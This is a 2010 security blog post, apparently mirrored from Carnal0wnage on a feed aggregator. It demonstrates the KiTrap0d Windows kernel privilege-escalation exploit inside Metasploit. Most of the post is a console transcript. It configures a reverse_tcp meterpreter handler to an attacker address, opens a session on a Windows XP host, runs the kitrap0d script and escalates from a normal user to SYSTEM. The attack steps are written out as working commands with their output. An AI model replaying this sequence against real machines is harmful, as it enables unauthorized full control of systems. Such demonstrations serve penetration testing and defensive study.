jetlib.sec » Carnal0wnage » KiTrap0d now in metasploit

Feeds

133019 items (0 unread) in 27 feeds

• 1337day (was: Inj3ct0r, 1337db)
• OSVDB Vulnerabilities
• Exploit-DB
• SecurityFocus Vulnerabilities
• Bugtraq
• Full Disclosure
• XSSed
• Packet Storm Security Headlines
• Packet Storm Security Advisories
• Packet Storm Security Exploits
• Packet Storm Security Recent Files
• Packet Storm Security Tools
• Packet Storm Security Misc. Files
• Sophos security news
• Sophos product advisories
• Penetration Testing
• SecuriTeam
• BackTrack Linux Forums
• Threatpost
• SecDocs
• carnal0wnage.attackresearch.com
• Carnal0wnage
• Kernel Fun
• Darknet
• The Exploitant
• Hack a Day
• Wirevolution

Carnal0wnage

• January 29, 2010
• 

  KiTrap0d now in metasploit

  Posted: January 29th, 2010, 8:55am PST by CG

  Tags:  handler meterpreter windows kernel-stack docume-1 service-pack-3 metasploit  

  more for documentation and historical purposes than "new hotness"
  
  original advisory
  http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html
  "Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack"
  
  Now implemented in Metasploit
  
  msf exploit(handler) > set PAYLOAD windows/meterpreter/
  PAYLOAD => windows/meterpreter/reverse_tcp
  msf exploit(handler) > set LHOST 192.168.1.100
  LHOST => 192.168.1.100
  msf exploit(handler) > set LPORT 443
  LPORT => 443
  msf exploit(handler) > exploit
  
  [*] Starting the payload handler...
  [*] Started reverse handler on port 443
  [*] Sending stage (725504 bytes)
  [*] Meterpreter session 1 opened (192.168.1.100:443 -> 192.168.1.200:50777)
  
  meterpreter > getuid
  Server username: WINXPSP3\user
  meterpreter > sysinfo
  Computer: WINXPSP3
  OS : Windows XP (Build 2600, Service Pack 3).
  Arch : x86
  Language: en_US
  meterpreter > run ki
  run killav run kitrap0d
  meterpreter > run kitrap0d
  [*] Currently running as WINXPSP3\user
  
  [*] Loading the vdmallowed executable and DLL from the local system...
  [*] Uploading vdmallowed to C:\DOCUME~1\user\LOCALS~1\Temp\pOOiEDDBFzJ.exe...
  [*] Uploading vdmallowed to C:\DOCUME~1\user\LOCALS~1\Temp\vdmexploit.dll...
  [*] Escalating our process (PID:1128)...
  
  --------------------------------------------------
  Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit
  -------------------------------------------- taviso@sdf.lonestar.org ---
  
  
  [?] GetVersionEx() => 5.1
  [?] NtQuerySystemInformation() => \WINDOWS\system32\ntkrnlpa.exe@804D7000
  [?] Searching for kernel 5.1 signature: version 2...
  [+] Trying signature with index 3
  [+] Signature found 0x29142 bytes from kernel base
  [+] Starting the NTVDM subsystem by launching MS-DOS executable
  [?] CreateProcess("C:\WINDOWS\twunk_16.exe") => 1316
  [?] OpenProcess(1316) => 0x7e8
  [?] Injecting the exploit thread into NTVDM subsystem @0x7e8
  [?] WriteProcessMemory(0x7e8, 0x2070000, "VDMEXPLOIT.DLL", 14);
  [?] WaitForSingleObject(0x7cc, INFINITE);
  [?] GetExitCodeThread(0x7cc, 0012FF44); => 0x77303074
  [+] The exploit thread reports exploitation was successful
  [+] w00t! You can now use the shell opened earlier
  
  [*] Deleting files...
  [*] Now running as NT AUTHORITY\SYSTEM
  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM
  
  **Nipple Rub...**